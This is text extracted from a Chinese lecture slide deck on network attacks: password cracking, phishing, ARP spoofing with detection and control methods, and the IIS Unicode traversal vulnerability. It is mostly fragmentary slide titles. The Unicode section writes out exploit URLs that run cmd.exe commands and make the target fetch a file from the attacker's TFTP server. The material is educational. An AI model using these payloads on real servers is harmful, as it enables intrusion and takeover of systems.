03网络入侵与ARP欺骗.pptVIP

网络安全攻击术;本章内容预览;3.1口令攻击;3.1.1社会工程学口令攻击;目前社会工程学攻击主要包括两种方式：打电话请求密码和伪造Email 1、打电话请求密码 冒充失去密码的合法雇员打电话寻问密码。 2、伪造Email 截取身份证发送Email的全部信息，这样的Email消息是真的，黑客可以伪造这些，冒充系统管理员或经理，获得大量的信息，实施他们的恶意攻击。;3.1.2 物理接触口令攻击;A. 获取管理员密码 ;案例3-1 获取管理员密码;;B. 权限提升;案例3-2 普通用户建立管理员帐号;案例3-2 普通用户建立管理员帐号;3.1.3 暴力攻击;A. 字典攻击;字典文件 ;B. 攻击实例;（1）暴力破解操作系统密码 ;（2） 暴力破解邮箱密码 ;（3） 暴力破解软件密码 ;案例：Office文档暴力破解;案例：Office文档暴力破解;案例：Office文档暴力破解;3.1.4 钓鱼攻击;3.1.4 钓鱼攻击;3.1.5 口令的防护;A. 选择安全密码;B. 设置安全策略;安全策略;安全策略;安全策略;3.2 ARP攻击;A. ARP协议概述;ARP使用例 ;B. ARP欺骗;ARP欺骗 ;ARP欺骗;ARP欺骗;ARP欺骗;ARP欺骗的具体步骤：;C. ARP代理;ARP代理;ARP代理;D. 发生ARP病毒故障现象;E. ARP欺骗的检测与控制办法;(1) 抓包分析方法;(2) 查询ARP缓存表方法;F. ARP欺骗的控制方法;ARP欺骗的控制方法;ARP欺骗的控制方法;G. ARP攻击小结;3.3 Unicode漏洞攻击;A. Unicode漏洞;B. Unicode漏洞攻击原理;Unicode漏洞攻击原理;Unicode漏洞攻击原理;Unicode漏洞攻击原理;B. Unicode漏洞攻击实例;攻击实例1：读取系统盘目录;攻击实例2：删除主页;攻击实例3：拷贝文件;此后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为： 09/scripts/c.exe?/c+dir+c:\ 执行的结果如图所示。;系统实例4：入侵系统;（1）建立tftp服务器;这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令： “09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”， 命令其实是“tftp –i 10 get idq.dll”意思是从10服务器上获取idq.dll文件。 ;（3）查看scripts目录 ;（4）入侵对方主机 ;（5）建立用户 ;C. Unicode漏洞的检测与防御;Unicode漏洞的检测与防御;Unicode漏洞的检测与防御